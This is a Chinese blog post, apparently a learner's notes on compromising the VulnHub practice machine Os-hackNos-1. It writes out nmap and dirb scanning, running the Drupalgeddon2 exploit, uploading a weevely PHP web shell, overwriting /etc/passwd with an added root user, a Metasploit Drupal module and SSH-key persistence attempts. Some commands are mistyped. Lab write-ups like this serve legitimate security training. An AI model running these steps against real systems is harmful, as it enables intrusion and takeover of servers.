HackNos-Os-hackNos-1靶机过关练习笔记

最新推荐文章于 2024-07-04 23:47:25 发布
最新推荐文章于 2024-07-04 23:47:25 发布
阅读量798 收藏 1
点赞数 1
文章标签: 安全 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qlqlulu/article/details/109958922
版权

文章目录


Os-hackNos-1靶机
实验主机:kali linux虚拟机(VM)
实验靶机:Os-hackNos-1靶机(Virtualbox)
实验网络:桥接模式
实验难度:简单
flag:1.普通用户的user.txt;2.root用户的user.txt
再深入是root权限维持,就是生成公钥,将kali的公钥放入Os-hackNos-1靶机里生成公钥文件ssh-keygen,后面意外翻车,就是无法成功顺利的在靶机创建公钥文件,所有root权限维持也就没成功实现,如有大佬帮忙讲解一下,谢谢~!

练习笔记:

一,信息收集

1.先看下自己是谁,是不是有一个看似正常人的身份,有没有一个正常的IP

ifconfig

在这里插入图片描述2.很正常,先犀利的环顾四周看下有没有明显的目标

nmap -sP 192.168.*.0/24

在这里插入图片描述3。发现目标,管他什么刀枪棍棒,先看下他的全身破绽,有什么开启的服务端口

nmap 192.168.4.233 -O -sS -sV -v

在这里插入图片描述发现它开启了22:ssh和80:http服务
4。http服务有Apache,那就搜下它的网址

http://192.168.4.233

在这里插入图片描述打开一个Apache页面
5.既然是个http,也到开了网页,搜下他的网址,看看有什么金银珠宝

dirb http://192.168.4.233

在这里插入图片描述发现它有一个drupal目录,在看下这个目录
在这里插入图片描述打开了一个登录页面,瞄眼插件,发现CMS是Drupal7,顺着这个瓜搜一下有没有情况

drupal exploit github

在这里插入图片描述在这里插入图片描述在漏洞库看到对应的漏洞,破绽出来了。

二,获取目标的shell

1.发现了漏洞,下载漏洞文件去开发破绽

git clone https://github.com/dreadlocked/Drupalgeddon2.git

在这里插入图片描述下载一个依赖库highline

gem install highline

在这里插入图片描述OK下载over
2.进入Drupalgeddon2文件夹
在这里插入图片描述使用Drupalgeddon2.rb潜进网站drupal目录

./drupalgeddon2.rb http://192.168.4.233/drupal

在这里插入图片描述潜入成功,可惜权限太小
在这里插入图片描述

三,权限维持

1.使用weevely工具生成一个php文件

weevely generate mima ./文件名.php

在这里插入图片描述2.打开python服务,将生成的php文件给它传上去

python -c SimpleHTTPServer 8080

weevely http://192.168.4.207:8080/文件名.php

IP地址后面的8080端口是必须添加的,否则会发现python服务看了却上传不成功,开始怀疑人生
在这里插入图片描述3.既然上传文件成功,那就用这把钥匙开更高的门

weevely http://192.168.4.233/drupal/文件名.php 密码

在这里插入图片描述

四,提权

1.这样就拿到了普通用户权限,看下这普通用户的用户名和密码。
在这里插入图片描述2.居然是个加密,不难,先用base64解密
https://base64.supfree.net/
在这里插入图片描述在这里插入图片描述发现还一层加密,在使用brainfuck解密
在这里插入图片描述OK成功,实验一下
在这里插入图片描述在这里插入图片描述在终端中运行,试验一下,没能进入root
在这里插入图片描述在这里插入图片描述看了下etc文件下有passwd文件
在这里插入图片描述查看发现passwd是可以访问的,但编辑不了
在这里插入图片描述在这里插入图片描述将它下载下来,添加用户名和密码在传回去

file_download passwd 目录

在这里插入图片描述openssl passwd -1 -salt salt 用户名
将这段添加进passwd里

在这里插入图片描述wget http://192.168.4.233:8080/passwd -O passwd
上传
在这里插入图片描述tali -1 passwd
查看最后一行
在这里插入图片描述
打开msf

 msfconsole

在这里插入图片描述搜索drupal漏洞

search drupal

在这里插入图片描述选择第四个

use 第四个

set rhosts 192.168.4.233
set targeturi /drupal
run

在这里插入图片描述ptrhon3 -c ‘import pty; pty.spawn("/bin/bash")’

在输入之前创建的用户名和密码就登陆到root权限了
在这里插入图片描述
这是拿到的两个flag
在这里插入图片描述

root权限维持:

没做出来,记些命令
‘两台机器都生成公钥(这是在网上看的,个人想法只在kali生成公钥放到hacknos里生成公钥文件,也是可以做出来的)

 ssh-keygen 生成公钥

在这里插入图片描述是不是公钥太长了哈哈

我是在下面一步翻车的,复制kali公钥,前面复制进去后面它自己又复制一遍而且这一遍前面都有>这种箭头,先创建文件在vim打开输入也这样,根本创建不成功,很难受,可以提点一下吗

echo 'ssh-rsa kali公钥 root@kali' > 公钥文件名_keys

在用ssh连接

ssh 之前创建的用户名@192.168.4.233

连接成功输入whoami就是root权限了

请提点,谢谢~!!!
Bye!
在这里插入图片描述

Abc_Kimball
关注
靶机 Hacknos:1
m0_51811529的博客
08-30 499
靶机1
vulnhub靶机Os-hackNos-1
Long_gone的博客
01-30 762
一、信息收集 首先扫描靶机IP: arp-scan 192.168.1.110 确定靶机IP为:192.168.1.110后,扫描靶机端口开放情况: nmap -sV -p 0-65535 192.168.1.110 可以看见靶机只开放了22和80端口,然后先访问一下80端口看一下: 是一个Apache2的页面,除此之外就没发现什么其他的东西了,然后再扫描一下目录看看会有什么发现: di...
靶机Hacknos-1
weixin_50815573的博客
02-21 1680
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHub 将Os-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
Os-hackNos
最新发布
weixin_44770698的博客
07-04 731
靶场练习-64
OS-HACKNOS-1
LainWith的博客
12-25 1090
目录介绍信息收集主机发现方法1网站探测目录扫描gobuster目录扫描查看drupal版本搜索EXPRCE-信息收集反弹shell目标1获取james的账密切换身份方法2网站探测dirb 目录扫描dirbuster挖掘drupal目录获取账号密码登录网站msf拿session提权目标2参考 介绍 难度:容易 ——> 中 flag: 两个, 一个是普通用户的user.txt、另外一个是root用户的user.txt 靶机的地址:https://www.vulnhub.com/entry/hacknos-
vulnhub靶场,Os-hackNos-1
kukudeshuo的博客
07-18 576
vulnhub靶场,Os-hackNos-1 环境准备 攻击机:kali(192.168.58.130) 靶机Os-hackNos-1(192.168.58.156) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.156 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 就是一个ubuntu系统的默认ht
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
Os-HackNos-2.1靶机
weixin_46062722的博客
11-18 296
实验环境 攻击机器IP地址:192.168.4.93 目标靶机IP地址:192.168.4.87 网络环境:桥接网络 信息收集 先查看攻击机kali Linux的IP地址 命令:ifconfig 得到自己的IP地址192.168.4.93 我们用Nmap扫描一下存活的主机 命令:nmap -sP 192.168.4.0/24 得到目标靶机IP地址为192.168.4.87 既然我们得到了目标靶机的IP地址,用nmap工具进行端口扫描,发现开放了22和80端口 命令:nmap -A -v 192.16
1-OSCP自学笔记-October靶机练习1
08-04
OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
VulnHub—Os-hackNos-3
weixin_39219503的博客
01-07 860
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 题目信息如下,难度中等,需要获取俩个flag Difficulty: Intermediate Flag: 2 Flag first user And the second root Learning: Web Application | Enume...
Os-hackNos-1靶机
weixin_46062722的博客
11-10 356
靶机:192.168.9.43 攻击机kali:192.168.9.16 查看kali的IP地址 在kali上主机发现 命令:nmap -sP 192.168.9.0/24 搜索到靶机的IP地址为192.168.9.43 我们进行端口扫描 命令:nmap -A -v 192.168.9.43 发现22端口和80端口开着 然后我们在浏览器上访问80端口192.168.9.43 下面进行目录遍历 命令:dirb http://192.168.9.43 发现http://192.168.9.43/drupal
vulnhub靶机 Os-hackNos-1
witwitwiter的博客
08-24 2404
vulnhub靶机 Os-hackNos-1 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 在将靶机文件下载下来为Os-hackNos-1.ova 使用vm打开这个ova文件进行导入。导入完成后,若是遇到无法获取ip地址,则需要在启动界面点击shift进入如下界面按下e 向下翻动,将ro改为rw single init=/bin/bash 然后按下 ctr
VulnHub—Os-hackNos-1
weixin_39219503的博客
12-22 557
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 题目信息如下,难度中等偏下,需要获取俩个flag Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learning : exploit | Web Ap...
Vulnhub靶机练习笔记-Os-hackNos-1
2301_80115097的博客
04-10 862
现在提权的思路就是先下载靶机上的passwd,然后添加一个有root权限的用户到构造的passwd文件中,然后使用wget -O把构造的passwd内容重定向输入到原本的/etc/passwd中。dirb也扫一边,貌似dirb扫到的结果比dirsearch多,所以在实战的时候可以用多个不同的工具进行信息收集,这样才更全面。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。访问drupal目录,是一个登录界面,弱口令登录测试无果,换换别的思路。
Vulnhub靶机HACKNOSOS-HACKNOS-2.1
LainWith的博客
02-05 3208
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
vulnhub靶机练习-Os-hackNos-1
yyj1781572的博客
11-25 671
vulnhub靶机练习-Os-hackNos-1
Os-hackNos-1
果粒程
11-18 107
Os-hackNos-1
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值